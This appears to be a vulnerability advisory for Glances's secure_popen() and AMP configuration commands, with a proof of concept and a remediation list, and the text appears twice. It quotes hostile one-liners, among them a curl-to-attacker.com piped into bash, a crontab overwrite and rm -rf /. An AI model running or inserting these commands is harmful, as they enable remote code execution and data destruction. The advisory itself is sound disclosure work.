Summary
The secure_popen() function in glances/secure.py interprets > (file redirection), | (pipe), and && (command chaining) operators in command strings. These operators are applied without any validation on the target file path, piped command, or chained command.
When Application Monitoring Process (AMP) modules load their command or service_cmd configuration values from glances.conf, those values are passed directly to secure_popen() with no sanitization. This allows an attacker who can modify the Glances configuration file to write arbitrary content to arbitrary filesystem paths (via >), chain arbitrary commands (via &&), or pipe command output to arbitrary programs (via |).
Crucially, this vulnerability is not mitigated by the --disable-config-exec flag that was introduced to address CVE-2026-33641. That flag only disables backtick command execution in config.get_value(); it does not affect the secure_popen() function's interpretation of shell-like operators.
Details
Affected code path 1 — Default AMP (glances/amps/default/__init__.py:69)
res = self.get('command')
# ...
self.set_result(secure_popen(res).rstrip())
The command config value is loaded from [amp_<name>] sections via GlancesAmp.load_config() (glances/amps/amp.py:81):
self.configs[param] = config.get_value(amp_section, param).split(',')
Affected code path 2 — SystemV AMP (glances/amps/systemv/__init__.py:60)
res = secure_popen(self.get('service_cmd'))
The service_cmd config value is loaded from [amp_systemv] sections via the same GlancesAmp.load_config() method.
Sink — secure_popen() (glances/secure.py:33-77)
The function explicitly parses:
> for file redirection (line 39): cmd.split('>') — the path after > is used directly in open(stdout_redirect, "w") (line 71) with no path validation.
| for command piping (line 51): cmd.split('|') — each segment is executed as a separate Popen with stdout piped to the next.
&& for command chaining (line 27 in secure_popen): cmd.split('&&') — each segment is executed sequentially.
None of these operators are sanitized or restricted when loading AMP configuration values.
Why --disable-config-exec does not help:
The --disable-config-exec flag (introduced for CVE-2026-33641) only prevents system_exec() from running backtick-embedded commands in config.get_value(). It does not affect how the resulting string value is processed by secure_popen(). A command value like echo data > /etc/crontab contains no backticks and passes through get_value() unchanged, then secure_popen() interprets the > operator and writes to the arbitrary path.
PoC
Clean-checkout recipe:
- Create a test configuration file:
cat > /tmp/poc-glances.conf << 'EOF'
[amp_poc]
enable=true
regex=.*
refresh=3
command=echo POC_ARBITRARY_FILE_WRITE > /tmp/cve-poc-marker-amp
[outputs]
cors_origins=*
EOF
- Run a Python script that simulates the AMP command execution path:
import sys
sys.path.insert(0, '/path/to/glances')
from glances.config import Config
from glances.secure import secure_popen
import os
# Load config with --disable-config-exec ACTIVE (CVE-2026-33641 mitigation)
config = Config(config_dir='/tmp/poc-glances.conf', disable_config_exec=True)
# Read AMP command value (same as amp.py load_config)
command = config.get_value('amp_poc', 'command')
print(f'Command: {command!r}')
# Execute (same as amps/default/__init__.py line 69)
marker = '/tmp/cve-poc-marker-amp'
assert not os.path.exists(marker), 'Clean state required'
result = secure_popen(command)
print(f'Result: {result!r}')
# Verify arbitrary file write occurred
assert os.path.exists(marker), 'VULNERABILITY NOT CONFIRMED'
with open(marker) as f:
content = f.read()
print(f'Written to {marker}: {content!r}')
assert 'POC_ARBITRARY_FILE_WRITE' in content
# Cleanup
os.remove(marker)
print('CONFIRMED: Arbitrary file write via secure_popen > in AMP command')
Expected vulnerable output:
Command: 'echo POC_ARBITRARY_FILE_WRITE > /tmp/cve-poc-marker-amp'
Result: 'POC_ARBITRARY_FILE_WRITE\n'
Written to /tmp/cve-poc-marker-amp: 'POC_ARBITRARY_FILE_WRITE\n'
CONFIRMED: Arbitrary file write via secure_popen > in AMP command
Negative/control case (demonstrating --disable-config-exec only blocks backticks):
# This IS blocked by --disable-config-exec:
# command=`rm -rf /` → get_value() skips backtick execution
# This is NOT blocked by --disable-config-exec:
# command=echo data > /etc/crontab → secure_popen writes to /etc/crontab
Cleanup:
rm -f /tmp/poc-glances.conf /tmp/cve-poc-marker-amp
Impact
An attacker who can modify glances.conf (e.g., through a separate file-write vulnerability, a misconfigured shared filesystem, a configuration management system, or a container volume mount) can:
-
Write arbitrary content to arbitrary files via the > operator — e.g., overwriting /etc/crontab, ~/.ssh/authorized_keys, or any file writable by the Glances process user.
-
Execute arbitrary commands via the && and | operators — e.g., echo x && curl http://attacker.com/shell.sh | bash.
-
Exfiltrate data via the | operator piping command output to network utilities.
The existing --disable-config-exec mitigation for CVE-2026-33641 does not protect against this vulnerability because it operates at a different layer (config.get_value() backtick processing vs. secure_popen() operator interpretation).
Suggested remediation
-
Remove file redirection support from secure_popen() unless explicitly required. The > operator in __secure_popen() (lines 39-45, 69-72) writes to arbitrary paths. Consider removing this feature or restricting output paths to a safe directory (e.g., a configured output directory with path traversal protection).
-
Sanitize AMP command values before passing them to secure_popen(). Apply the same sanitization used in actions.py:_sanitize_mustache_dict() to strip &&, |, >>, and > from AMP command and service_cmd config values, or refuse to execute commands containing these operators.
-
Consider replacing secure_popen() with subprocess.run(shell=False) using explicit argument arrays. The secure_popen() function reimplements shell-like operator parsing (&&, |, >) which is inherently risky. Standard subprocess.run() with shell=False and an explicit argument list avoids this class of vulnerability entirely.
-
Add a regression test that verifies AMP commands cannot contain file redirection or command chaining operators.
References
Summary
The
secure_popen()function inglances/secure.pyinterprets>(file redirection),|(pipe), and&&(command chaining) operators in command strings. These operators are applied without any validation on the target file path, piped command, or chained command.When Application Monitoring Process (AMP) modules load their
commandorservice_cmdconfiguration values fromglances.conf, those values are passed directly tosecure_popen()with no sanitization. This allows an attacker who can modify the Glances configuration file to write arbitrary content to arbitrary filesystem paths (via>), chain arbitrary commands (via&&), or pipe command output to arbitrary programs (via|).Crucially, this vulnerability is not mitigated by the
--disable-config-execflag that was introduced to address CVE-2026-33641. That flag only disables backtick command execution inconfig.get_value(); it does not affect thesecure_popen()function's interpretation of shell-like operators.Details
Affected code path 1 — Default AMP (
glances/amps/default/__init__.py:69)The
commandconfig value is loaded from[amp_<name>]sections viaGlancesAmp.load_config()(glances/amps/amp.py:81):Affected code path 2 — SystemV AMP (
glances/amps/systemv/__init__.py:60)The
service_cmdconfig value is loaded from[amp_systemv]sections via the sameGlancesAmp.load_config()method.Sink —
secure_popen()(glances/secure.py:33-77)The function explicitly parses:
>for file redirection (line 39):cmd.split('>')— the path after>is used directly inopen(stdout_redirect, "w")(line 71) with no path validation.|for command piping (line 51):cmd.split('|')— each segment is executed as a separatePopenwith stdout piped to the next.&&for command chaining (line 27 insecure_popen):cmd.split('&&')— each segment is executed sequentially.None of these operators are sanitized or restricted when loading AMP configuration values.
Why
--disable-config-execdoes not help:The
--disable-config-execflag (introduced for CVE-2026-33641) only preventssystem_exec()from running backtick-embedded commands inconfig.get_value(). It does not affect how the resulting string value is processed bysecure_popen(). A command value likeecho data > /etc/crontabcontains no backticks and passes throughget_value()unchanged, thensecure_popen()interprets the>operator and writes to the arbitrary path.PoC
Clean-checkout recipe:
Expected vulnerable output:
Negative/control case (demonstrating
--disable-config-execonly blocks backticks):Cleanup:
Impact
An attacker who can modify
glances.conf(e.g., through a separate file-write vulnerability, a misconfigured shared filesystem, a configuration management system, or a container volume mount) can:Write arbitrary content to arbitrary files via the
>operator — e.g., overwriting/etc/crontab,~/.ssh/authorized_keys, or any file writable by the Glances process user.Execute arbitrary commands via the
&&and|operators — e.g.,echo x && curl http://attacker.com/shell.sh | bash.Exfiltrate data via the
|operator piping command output to network utilities.The existing
--disable-config-execmitigation for CVE-2026-33641 does not protect against this vulnerability because it operates at a different layer (config.get_value()backtick processing vs.secure_popen()operator interpretation).Suggested remediation
Remove file redirection support from
secure_popen()unless explicitly required. The>operator in__secure_popen()(lines 39-45, 69-72) writes to arbitrary paths. Consider removing this feature or restricting output paths to a safe directory (e.g., a configured output directory with path traversal protection).Sanitize AMP command values before passing them to
secure_popen(). Apply the same sanitization used inactions.py:_sanitize_mustache_dict()to strip&&,|,>>, and>from AMP command and service_cmd config values, or refuse to execute commands containing these operators.Consider replacing
secure_popen()withsubprocess.run(shell=False)using explicit argument arrays. Thesecure_popen()function reimplements shell-like operator parsing (&&,|,>) which is inherently risky. Standardsubprocess.run()withshell=Falseand an explicit argument list avoids this class of vulnerability entirely.Add a regression test that verifies AMP commands cannot contain file redirection or command chaining operators.
References